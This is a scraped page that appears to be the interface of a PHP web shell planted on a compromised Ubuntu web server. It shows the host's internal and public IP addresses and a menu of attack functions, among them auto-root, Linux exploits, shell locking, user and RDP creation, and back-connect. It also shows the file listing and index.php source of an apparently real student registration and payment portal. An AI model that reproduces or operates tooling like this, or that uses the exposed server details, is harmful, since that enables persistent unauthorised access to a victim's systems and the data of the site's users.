Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.234.125
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
demo /
rcubpgcet /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
libs
[ DIR ]
drwxrwxr-x
links
[ DIR ]
drwxrwxr-x
reg_soon_files
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
student_photos
[ DIR ]
drwxrwxr-x
tarka_pdf
[ DIR ]
drwxrwxr-x
tarka_pdf_latest
[ DIR ]
drwxrwxr-x
app.php
427
B
-rw-rw-r--
cconfig.php
1.21
KB
-rw-rw-r--
enable_app_status.php
3.48
KB
-rw-rw-r--
enable_payment.php
3.4
KB
-rw-rw-r--
hall_ticket.php
2.98
KB
-rw-rw-r--
index.php
2.29
KB
-rw-rw-r--
make_payment.php
2.79
KB
-rw-rw-r--
notif.pdf
269.58
KB
-rw-rw-r--
payment_gate_way_responce.php
7.31
KB
-rw-rw-r--
payment_gateway.php
2.49
KB
-rw-rw-r--
print_app_form.php
3.45
KB
-rw-rw-r--
reg_soon.htm
23.92
KB
-rw-rw-r--
registration.php
724
B
-rw-rw-r--
vpc_php_serverhost_do.php
6.69
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="shortcut icon" type="image/jpg" href="img/favicon.jpg" /> <?php require_once("links/js_files.php");?> <script type="text/javascript"> $(function(){ $('.index_label_div').corner("5px").css("border","1px solid #336699"); $('.messageboard-div').corner("5px").css("border","1px solid #336699"); $('.div_app_form_center_blue').corner("5px").css("border","1px solid #336699"); }); </script> </head> <body > <div id='main_frame'> <div class='header_main_div'> <?php require_once("links/header.php");?> <div id="index_main_page"> <div class='index_left_menu' style='float:left;'> <div class='index_label_div'><div style='background: url("img/Broucher.jpg") #3D3D3D;'></div> <a href="notif.pdf">Notification</a></div> <div class='index_label_div'><div style='background: url("img/Broucher.jpg") #3D3D3D;'></div> <a href="notif.pdf">Broucher</a></div> <div class='index_label_div'><div style='background: url("img/Applyonline.jpg") #3D3D3D;'></div> <a href="registration.php">Online Registration</a></div> <div class='index_label_div'><div style='background: url("img/Makepaymentimg.jpg") #3D3D3D;'></div> <a href="enable_app_status.php">Make Payment</a></div> <div class='index_label_div'><div style='background: url("img/ReprintAppForm.jpg") #3D3D3D;'></div> <a href="print_app_form.php">Print Application</a></div> </div> <div class='index_right_menu' style='float:right;margin-right: 8px;'> <div id='div_app_form_center' class="messageboard-div" style='margin: 10px 6px;height:300px;'> <div style="height:28px; padding:2px;" align='center' class="div_app_form_center_blue"> <a style='font-family:Trebuchet MS;word-spacing: 4px; color:#FFFFFF;padding: 3px 0 0 8px;'>Message Board</a></div> <span style='font-size: 13px; font-weight: normal; line-height: 40px; margin-left: 6px;'>Online Registration will start from 06/06/2014</span> </div> </div> </div> <?php require_once("links/footer.php");?> </div> </div> </br> </body> </html>
Close